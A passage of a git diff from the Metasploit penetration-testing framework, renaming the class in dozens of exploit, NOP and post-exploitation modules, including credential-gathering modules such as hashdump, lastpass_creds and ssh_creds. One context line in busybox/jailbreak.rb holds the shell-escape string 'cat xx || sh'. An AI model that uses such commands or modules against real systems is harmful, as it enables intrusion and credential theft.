b/modules/exploits/windows/vnc/ultravnc_client.rb index f024c09371..4fd21103e0 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index 6fa83a3ca9..2822427e85 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 577b1ddc1d..26bb1236d2 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -6,7 +6,7 @@ require 'msf/core' - class Metasploit < Msf::Exploit::Remote + class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index 58e589be35..24c94599c7 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index d411acf6ea..71d8a1c447 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::WinRM diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index d4c3aea12c..4d7028f656 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index ec0d65615b..a2ba2e1f56 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for ARM (little endian) # ### -class Metasploit < Msf::Nop +class Metasploit3 < Msf::Nop def initialize diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index 25dfe9a390..0498fd6817 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for PHP payloads # ### -class Metasploit < Msf::Nop +class Metasploit3 < Msf::Nop def initialize super( diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 044337caf0..73e0f0f4ed 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for PowerPC # ### -class Metasploit < Msf::Nop +class Metasploit3 < Msf::Nop def initialize diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index fe079a61a4..6227cf4c38 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements NOP generator for the SPARC platform # ### -class Metasploit < Msf::Nop +class Metasploit3 < Msf::Nop # Nop types InsSethi = 0 diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 08b108615f..26f9189a55 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for TTY payloads # ### -class Metasploit < Msf::Nop +class Metasploit3 < Msf::Nop def initialize super( diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index a8c8440cdd..765a636309 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Nop +class Metasploit3 < Msf::Nop def initialize super( diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index 391bee954e..d45d90434e 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -17,7 +17,7 @@ require 'rex/nop/opty2' # ADMmutate and from spoonfu. # ### -class Metasploit < Msf::Nop +class Metasploit3 < Msf::Nop def initialize super( diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 03f0406d2a..3607aa361f 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -13,7 +13,7 @@ require 'msf/core' # ADMmutate and from spoonfu. # ### -class Metasploit < Msf::Nop +class Metasploit3 < Msf::Nop SINGLE_BYTE_SLED = { diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb index 94d57e7f9c..dd9de9fc96 100644 --- a/modules/post/aix/hashdump.rb +++ b/modules/post/aix/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/cisco/gather/enum_cisco.rb b/modules/post/cisco/gather/enum_cisco.rb index 3aaaa78632..515c7b8595 100644 --- a/modules/post/cisco/gather/enum_cisco.rb +++ b/modules/post/cisco/gather/enum_cisco.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/cisco' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Cisco def initialize(info={}) super( update_info( info, diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb index 35c1cb1e18..4fc5f6cc6e 100644 --- a/modules/post/firefox/gather/cookies.rb +++ b/modules/post/firefox/gather/cookies.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb index bf45bb4da2..932105e952 100644 --- a/modules/post/firefox/gather/history.rb +++ b/modules/post/firefox/gather/history.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index b0123d3a77..0009613d36 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -7,7 +7,7 @@ require 'json' require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb index ffa57d3fd9..dbe1b8a48c 100644 --- a/modules/post/firefox/gather/xss.rb +++ b/modules/post/firefox/gather/xss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'msf/core/payload/firefox' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/manage/webcam_chat.rb b/modules/post/firefox/manage/webcam_chat.rb index d0533dd50f..5e568c8584 100644 --- a/modules/post/firefox/manage/webcam_chat.rb +++ b/modules/post/firefox/manage/webcam_chat.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation include Msf::Post::WebRTC diff --git a/modules/post/linux/busybox/enum_connections.rb b/modules/post/linux/busybox/enum_connections.rb index 7ddfa77c69..473c55c7de 100644 --- a/modules/post/linux/busybox/enum_connections.rb +++ b/modules/post/linux/busybox/enum_connections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/enum_hosts.rb b/modules/post/linux/busybox/enum_hosts.rb index 5fda45d7c7..996a6f377f 100644 --- a/modules/post/linux/busybox/enum_hosts.rb +++ b/modules/post/linux/busybox/enum_hosts.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index 52b6ffac8b..9db686e65a 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post METHODS = [ 'cat xx || sh', diff --git a/modules/post/linux/busybox/ping_net.rb b/modules/post/linux/busybox/ping_net.rb index f230d4812e..4e1191304b 100644 --- a/modules/post/linux/busybox/ping_net.rb +++ b/modules/post/linux/busybox/ping_net.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/busybox/set_dmz.rb b/modules/post/linux/busybox/set_dmz.rb index 10cda582f6..a2d109cd6b 100644 --- a/modules/post/linux/busybox/set_dmz.rb +++ b/modules/post/linux/busybox/set_dmz.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize super( diff --git a/modules/post/linux/busybox/set_dns.rb b/modules/post/linux/busybox/set_dns.rb index cf551abccc..7732059d03 100644 --- a/modules/post/linux/busybox/set_dns.rb +++ b/modules/post/linux/busybox/set_dns.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/smb_share_root.rb b/modules/post/linux/busybox/smb_share_root.rb index f267736184..f89e57e6c1 100644 --- a/modules/post/linux/busybox/smb_share_root.rb +++ b/modules/post/linux/busybox/smb_share_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/wget_exec.rb b/modules/post/linux/busybox/wget_exec.rb index e7c34be37e..38e90216a0 100644 --- a/modules/post/linux/busybox/wget_exec.rb +++ b/modules/post/linux/busybox/wget_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index 4063b4f325..c3085a1104 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/ecryptfs_creds.rb b/modules/post/linux/gather/ecryptfs_creds.rb index f01ac412cd..21bbd3f3eb 100644 --- a/modules/post/linux/gather/ecryptfs_creds.rb +++ b/modules/post/linux/gather/ecryptfs_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/linux/gather/enum_configs.rb b/modules/post/linux/gather/enum_configs.rb index 0e830eef83..8e6ca7cf9d 100644 --- a/modules/post/linux/gather/enum_configs.rb +++ b/modules/post/linux/gather/enum_configs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb index cf00a3365a..ba52141294 100644 --- a/modules/post/linux/gather/enum_network.rb +++ b/modules/post/linux/gather/enum_network.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_protections.rb b/modules/post/linux/gather/enum_protections.rb index 93d858e956..ab18a0c403 100644 --- a/modules/post/linux/gather/enum_protections.rb +++ b/modules/post/linux/gather/enum_protections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_psk.rb b/modules/post/linux/gather/enum_psk.rb index 979f3214f4..9edc2a7ada 100644 --- a/modules/post/linux/gather/enum_psk.rb +++ b/modules/post/linux/gather/enum_psk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb index 45dd6edbdb..e96331fa98 100644 --- a/modules/post/linux/gather/enum_system.rb +++ b/modules/post/linux/gather/enum_system.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb index 3dff27cf51..6feeb24323 100644 --- a/modules/post/linux/gather/enum_users_history.rb +++ b/modules/post/linux/gather/enum_users_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_xchat.rb b/modules/post/linux/gather/enum_xchat.rb index 04d2712ac9..c6a722884d 100644 --- a/modules/post/linux/gather/enum_xchat.rb +++ b/modules/post/linux/gather/enum_xchat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb index 63fa52a1e0..ef049898e8 100644 --- a/modules/post/linux/gather/gnome_commander_creds.rb +++ b/modules/post/linux/gather/gnome_commander_creds.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index ffec76a393..eb049ae7da 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/mount_cifs_creds.rb b/modules/post/linux/gather/mount_cifs_creds.rb index a022c99f60..ed33627410 100644 --- a/modules/post/linux/gather/mount_cifs_creds.rb +++ b/modules/post/linux/gather/mount_cifs_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index de268ad000..cbdbfb31dd 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb index f1462c3dba..5e15132d46 100644 --- a/modules/post/linux/manage/download_exec.rb +++ b/modules/post/linux/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/multi/escalate/cups_root_file_read.rb b/modules/post/multi/escalate/cups_root_file_read.rb index a6f2261b63..578ae8ba22 100644 --- a/modules/post/multi/escalate/cups_root_file_read.rb +++ b/modules/post/multi/escalate/cups_root_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File LP_GROUPS = ['lpadmin', '_lpadmin'] diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 15e65f5d57..ab9535c6c3 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post Rank = ManualRanking include Msf::Post::File diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index b5da8d6a15..31d07e1ba0 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/apple_backup_manifestdb' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/check_malware.rb b/modules/post/multi/gather/check_malware.rb index 094a654f40..8a2104215d 100644 --- a/modules/post/multi/gather/check_malware.rb +++ b/modules/post/multi/gather/check_malware.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' require 'uri' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 4a6f91093a..8c07940817 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -8,7 +8,7 @@ require 'msf/core/auxiliary/report' require 'openssl' require 'digest/md5' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index bb8d75595b..3c987cc114 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_reverse_lookup.rb b/modules/post/multi/gather/dns_reverse_lookup.rb index 04f0132e9d..8e562b4db8 100644 --- a/modules/post/multi/gather/dns_reverse_lookup.rb +++ b/modules/post/multi/gather/dns_reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index e5eb796597..3ae16da37f 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index 0c0a0a9a9c..283ffbfa7b 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 8cdfa5a690..34938cb19b 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/multi/gather/fetchmailrc_creds.rb b/modules/post/multi/gather/fetchmailrc_creds.rb index 000783bfea..9b9de9aff2 100644 --- a/modules/post/multi/gather/fetchmailrc_creds.rb +++ b/modules/post/multi/gather/fetchmailrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 84517d3f32..736c4b9fc3 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/find_vmx.rb b/modules/post/multi/gather/find_vmx.rb index ce466b99f9..eb16f3e85b 100644 --- a/modules/post/multi/gather/find_vmx.rb +++ b/modules/post/multi/gather/find_vmx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index e268bc9e8e..fde3b370a8 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -21,7 +21,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index c882b093eb..6c296d9118 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 9524539e7f..c2b7ebaaaf 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -8,7 +8,7 @@ require 'sqlite3' require 'uri' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Post::OSX::System diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb index 82b2bbd8f5..c16ef69a6c 100644 --- a/modules/post/multi/gather/multi_command.rb +++ b/modules/post/multi/gather/multi_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/netrc_creds.rb b/modules/post/multi/gather/netrc_creds.rb index 69804d0a32..4bd3f3e381 100644 --- a/modules/post/multi/gather/netrc_creds.rb +++ b/modules/post/multi/gather/netrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 305aedb37d..09c3450e84 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 90d3124905..437ea9b73a 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index d5afa3f63e..1c76b839a8 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/remmina_creds.rb b/modules/post/multi/gather/remmina_creds.rb index 9da909e0ca..a7f9b7ff42 100644 --- a/modules/post/multi/gather/remmina_creds.rb +++ b/modules/post/multi/gather/remmina_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/resolve_hosts.rb b/modules/post/multi/gather/resolve_hosts.rb index 55dbcc190b..a5ccaa1a6c 100644 --- a/modules/post/multi/gather/resolve_hosts.rb +++ b/modules/post/multi/gather/resolve_hosts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/rsyncd_creds.rb b/modules/post/multi/gather/rsyncd_creds.rb index 4552237dd5..ee0736848e 100644 --- a/modules/post/multi/gather/rsyncd_creds.rb +++ b/modules/post/multi/gather/rsyncd_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/run_console_rc_file.rb b/modules/post/multi/gather/run_console_rc_file.rb index 867fe52a15..771391e748 100644 --- a/modules/post/multi/gather/run_console_rc_file.rb +++ b/modules/post/multi/gather/run_console_rc_file.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index f94b0b59b6..b07ccd6090 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -11,7 +11,7 @@ require 'csv' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index 2bceac5c25..b5746e929e 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'sshkey' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index 1df50b7234..bcda33c4ac 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index 082b72948d..cdb498623a 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/google/geolocation' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index c8ae75ef22..443f40d0b0 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index a0531f8359..0318bda57e 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/wall.rb b/modules/post/multi/general/wall.rb index cc6165ff81..563ccfe3c3 100644 --- a/modules/post/multi/general/wall.rb +++ b/modules/post/multi/general/wall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info = {}) super( update_info( diff --git a/modules/post/multi/manage/dbvis_add_db_admin.rb 